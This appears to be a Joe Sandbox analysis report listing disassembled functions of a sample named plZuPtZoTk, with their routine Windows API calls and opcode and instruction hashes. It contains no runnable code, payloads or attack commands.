                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$MoveWindow
                                                                      • String ID: Listbox
                                                                      • API String ID: 3315199576-2633736733
                                                                      • Opcode ID: ef904f3056c329fae8e80d51847ad37f6f307ef4a401c3d18483335bf827df0f
                                                                      • Instruction ID: 110f55c756dca100c9047d3728e6972b235e36c5ad1619946b43405c0469dfc1
                                                                      • Opcode Fuzzy Hash: ef904f3056c329fae8e80d51847ad37f6f307ef4a401c3d18483335bf827df0f
                                                                      • Instruction Fuzzy Hash: 2921AF72600218BBEF11CFA5CC81FAB376AFFC97A1F108114F9109B190CA71DC568BA0
                                                                      Function 00A349F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00A34A08
                                                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00A34A5C
                                                                      • SetErrorMode.KERNEL32(00000000,?,?,00A5CC08), ref: 00A34AD0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$InformationVolume
                                                                      • String ID: %lu
                                                                      • API String ID: 2507767853-685833217
                                                                      • Opcode ID: c3bc25d2d3473183998de80534b19a5ffff43c93d3b1d728b4a1769971584248
                                                                      • Instruction ID: a7644bbdda5331169dc8139c09caef42639b8ab59d98ab5292f1d47107ca718d
                                                                      • Opcode Fuzzy Hash: c3bc25d2d3473183998de80534b19a5ffff43c93d3b1d728b4a1769971584248
                                                                      • Instruction Fuzzy Hash: 69314F75A00209AFDB10DF54C985EAA7BF8FF48318F1480A9F909DB252D771ED46CB61
                                                                      Function 00A541EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00A5424F
                                                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00A54264
                                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00A54271
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID: msctls_trackbar32
                                                                      • API String ID: 3850602802-1010561917
                                                                      • Opcode ID: e0811af686bd19f396f18ce705686df39802acb31f13788500fa5ac8b7ef608d
                                                                      • Instruction ID: f9955291a6881d82ce47819f55d9c62f2fb518ff4019c3f32b1f56b8afd9b5ca
                                                                      • Opcode Fuzzy Hash: e0811af686bd19f396f18ce705686df39802acb31f13788500fa5ac8b7ef608d
                                                                      • Instruction Fuzzy Hash: FB11E371240208BEEF209F69CC46FEB3BACFF89B69F114514FA55E2090D671D8529B20
                                                                      Function 00A22F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 009C6B57: _wcslen.LIBCMT ref: 009C6B6A
                                                                        • Part of subcall function 00A22DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00A22DC5
                                                                        • Part of subcall function 00A22DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00A22DD6
                                                                        • Part of subcall function 00A22DA7: GetCurrentThreadId.KERNEL32 ref: 00A22DDD
                                                                        • Part of subcall function 00A22DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00A22DE4
                                                                      • GetFocus.USER32 ref: 00A22F78
                                                                        • Part of subcall function 00A22DEE: GetParent.USER32(00000000), ref: 00A22DF9
                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00A22FC3
                                                                      • EnumChildWindows.USER32(?,00A2303B), ref: 00A22FEB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                      • String ID: %s%d
                                                                      • API String ID: 1272988791-1110647743
                                                                      • Opcode ID: 0f309c96e997ab2c9a9870b5aa565b5d859294584d3ece8a62dfc0dac4810285
                                                                      • Instruction ID: c8ace0de0752b722e8e7599ec272b01cc9e130058a32125895468c459a276668
                                                                      • Opcode Fuzzy Hash: 0f309c96e997ab2c9a9870b5aa565b5d859294584d3ece8a62dfc0dac4810285
                                                                      • Instruction Fuzzy Hash: 7111B4716002157BDF14BF78AC95FED37AAAF85314F048079FD099B252DE349A498B70
                                                                      Function 00A55882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00A558C1
                                                                      • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00A558EE
                                                                      • DrawMenuBar.USER32(?), ref: 00A558FD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$InfoItem$Draw
                                                                      • String ID: 0
                                                                      • API String ID: 3227129158-4108050209
                                                                      • Opcode ID: 5dca91713c819e8bcb56d4daae16a1687ea1dcb597040a6530104ca746a8b54a
                                                                      • Instruction ID: 6231c9b1a113d3c9d0cfb8f2ebf064cfa68dec906b32a4b8e419845e23b2ae09
                                                                      • Opcode Fuzzy Hash: 5dca91713c819e8bcb56d4daae16a1687ea1dcb597040a6530104ca746a8b54a
                                                                      • Instruction Fuzzy Hash: AE018431900218EFDB119FA1DC45BAEBBB5FF45362F10C099E849D6261DB348A84DF71
                                                                      Function 00A1D3A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 00A1D3BF
                                                                      • FreeLibrary.KERNEL32 ref: 00A1D3E5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeLibraryProc
                                                                      • String ID: GetSystemWow64DirectoryW$X64
                                                                      • API String ID: 3013587201-2590602151
                                                                      • Opcode ID: 6a396d6a5b26453a36f50472caf2aae31605f5f931c5dbaf3d81aa473da1a0e4
                                                                      • Instruction ID: c2a471305657d6a5b16def19cbcb9296a9004daf02dc00dc6693cbc1e39e80be
                                                                      • Opcode Fuzzy Hash: 6a396d6a5b26453a36f50472caf2aae31605f5f931c5dbaf3d81aa473da1a0e4
                                                                      • Instruction Fuzzy Hash: 07F05571802B319FC73553208C949EE3334BF02B02B588616E812FE208EB34CCC48292
                                                                      Function 00A2007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 91fb29d325a360bc5aa34c1d7f37a0fb3fe1abb1df235c57b60aa5bc5d6d446e
                                                                      • Instruction ID: 2a83828d7f7f1e41f4575aa486016dba4e205d5c855ed5360ece5abef6bcad3b
                                                                      • Opcode Fuzzy Hash: 91fb29d325a360bc5aa34c1d7f37a0fb3fe1abb1df235c57b60aa5bc5d6d446e
                                                                      • Instruction Fuzzy Hash: 11C15A75A0021AEFDB04CFA8D894EAEB7B5FF48304F1185A8E505EB252D731ED41CB90
                                                                      Function 00A4342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearInitInitializeUninitialize
                                                                      • String ID:
                                                                      • API String ID: 1998397398-0
                                                                      • Opcode ID: 27924ceee2d1a59a697a3bbc8376ffe29d443b57837e775dfafe85d4be2864e5
                                                                      • Instruction ID: 351c875c3a89c5538d431846ebbd33ab36e2c9ca6a8ef2487dbc8b7245236a09
                                                                      • Opcode Fuzzy Hash: 27924ceee2d1a59a697a3bbc8376ffe29d443b57837e775dfafe85d4be2864e5
                                                                      • Instruction Fuzzy Hash: 69A1E67A6043119FCB10DF68C595A2AB7E5EF88714F05885DF98A9B362DB30EE01CB52
                                                                      Function 00A20436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00A5FC08,?), ref: 00A205F0
                                                                      • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00A5FC08,?), ref: 00A20608
                                                                      • CLSIDFromProgID.OLE32(?,?,00000000,00A5CC40,000000FF,?,00000000,00000800,00000000,?,00A5FC08,?), ref: 00A2062D
                                                                      • _memcmp.LIBVCRUNTIME ref: 00A2064E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: FromProg$FreeTask_memcmp
                                                                      • String ID:
                                                                      • API String ID: 314563124-0
                                                                      • Opcode ID: c6bca80b2ee3ce2d19f8fdf6cd788cc93747f3a3abf9c729b162084bad570d84
                                                                      • Instruction ID: acda06f566bba021b1d43284564a0c12f3cb4fbe37de4f0380a0ecee3941c41a
                                                                      • Opcode Fuzzy Hash: c6bca80b2ee3ce2d19f8fdf6cd788cc93747f3a3abf9c729b162084bad570d84
                                                                      • Instruction Fuzzy Hash: 77810E71A00119EFCB04DF98C984EEEB7B9FF89315F104568F516AB251DB71AE06CB60
                                                                      Function 00A01391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: _free
                                                                      • String ID:
                                                                      • API String ID: 269201875-0
                                                                      • Opcode ID: e10996a30dc93d13265c39cc5ebedb73158b6be2efa0f4ed17c30ad20f458438
                                                                      • Instruction ID: e95ea97cac3f7aa3e329cf9dcb4436d1baece2e7985a65b99b0897b4b23d8731
                                                                      • Opcode Fuzzy Hash: e10996a30dc93d13265c39cc5ebedb73158b6be2efa0f4ed17c30ad20f458438
                                                                      • Instruction Fuzzy Hash: B3412B7160051CABDB216BB9AC457FE3AA4EF81370F144226F529D72E1E7768C415362
                                                                      Function 00A56278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetWindowRect.USER32(0166E410,?), ref: 00A562E2
                                                                      • ScreenToClient.USER32(?,?), ref: 00A56315
                                                                      • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00A56382
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ClientMoveRectScreen
                                                                      • String ID:
                                                                      • API String ID: 3880355969-0
                                                                      • Opcode ID: a2d7cc5f96c3a5667b33470adec5fca774bcef985c8f32b8947edbc56c8b0fb1
                                                                      • Instruction ID: faf668d16d3db13ef0bfbed2051ed44ee64c16ead8917f2bae9ae251693b6354
                                                                      • Opcode Fuzzy Hash: a2d7cc5f96c3a5667b33470adec5fca774bcef985c8f32b8947edbc56c8b0fb1
                                                                      • Instruction Fuzzy Hash: E2512B74A00209EFDF10DF68D981AAE7BB5FF45361F508269F8159B2A0D730EE85CB50
                                                                      Function 00A41AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 00A41AFD
                                                                      • WSAGetLastError.WSOCK32 ref: 00A41B0B
                                                                      • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00A41B8A
                                                                      • WSAGetLastError.WSOCK32 ref: 00A41B94
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$socket
                                                                      • String ID:
                                                                      • API String ID: 1881357543-0
                                                                      • Opcode ID: 65f45b242ab6d4242a521d9ba686797377a3be9041da7b69a6a9b6afcbdf1e3a
                                                                      • Instruction ID: b08b398fc47170b2270adaf252ffec7ef6c43da24b3c1deb22984c99ede0122e
                                                                      • Opcode Fuzzy Hash: 65f45b242ab6d4242a521d9ba686797377a3be9041da7b69a6a9b6afcbdf1e3a
                                                                      • Instruction Fuzzy Hash: 40417078640200AFE720AF24C886F2977E5EB84718F54C45CF95A9F7D2E672DD828B91
                                                                      Function 009FB41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e5f503e9d4cbb5af5edf23345c92d4f855beb28f23045bba68981fee54dcf6b5
                                                                      • Instruction ID: faf49edd565fb5766fdae4c8e0ed742535881f194fa00918592c706d6bec2862
                                                                      • Opcode Fuzzy Hash: e5f503e9d4cbb5af5edf23345c92d4f855beb28f23045bba68981fee54dcf6b5
                                                                      • Instruction Fuzzy Hash: 76410875A00708AFD724AF38CD41BBABBA9EB84710F10452AF655DB691D775A9018B80
                                                                      Function 00A356D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00A35783
                                                                      • GetLastError.KERNEL32(?,00000000), ref: 00A357A9
                                                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00A357CE
                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00A357FA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                                                      • String ID:
                                                                      • API String ID: 3321077145-0
                                                                      • Opcode ID: e6cb710953c3e394868556dd3b6de9f75f4903a9c9cf31f04afc638ce7cdd1da
                                                                      • Instruction ID: 01441727b5dffd3aa8eb0732067e4bf55d13a62db23f395e46e59b7f1f2fdd5b
                                                                      • Opcode Fuzzy Hash: e6cb710953c3e394868556dd3b6de9f75f4903a9c9cf31f04afc638ce7cdd1da
                                                                      • Instruction Fuzzy Hash: E441FA35A00610DFCB11EF55C545B5DBBE1AF89720F198888F84A5B362CB34FD41DB91
                                                                      Function 009FD8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,009E6D71,00000000,00000000,009E82D9,?,009E82D9,?,00000001,009E6D71,8BE85006,00000001,009E82D9,009E82D9), ref: 009FD910
                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 009FD999
                                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 009FD9AB
                                                                      • __freea.LIBCMT ref: 009FD9B4
                                                                        • Part of subcall function 009F3820: RtlAllocateHeap.NTDLL(00000000,?,00A91444,?,009DFDF5,?,?,009CA976,00000010,00A91440,009C13FC,?,009C13C6,?,009C1129), ref: 009F3852
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                      • String ID:
                                                                      • API String ID: 2652629310-0
                                                                      • Opcode ID: 357912f26d35624ca4e02ab032d40becf854b0c9d80fe08b29e3f4aeeb4f120f
                                                                      • Instruction ID: dbe8175b166120de6f993d9c4fd952745b4226f69c4c8f3211c3b8e9d3ffaaae
                                                                      • Opcode Fuzzy Hash: 357912f26d35624ca4e02ab032d40becf854b0c9d80fe08b29e3f4aeeb4f120f
                                                                      • Instruction Fuzzy Hash: B231E172A0220AABDF25DFA5DC45EBE7BAAEB40710F054168FD04D7150EB75CE90CBA0
                                                                      Function 00A552C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 00A55352
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00A55375
                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00A55382
                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00A553A8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: LongWindow$InvalidateMessageRectSend
                                                                      • String ID:
                                                                      • API String ID: 3340791633-0
                                                                      • Opcode ID: 3e3d8a5d38547c5cab148cad6336b9cfc5e419f8129731c88b5319ddaa5acf96
                                                                      • Instruction ID: 45ec7bd349ac0a22a69865bed9b7fe94c4215d0bbb535225f5f23a09f4120beb
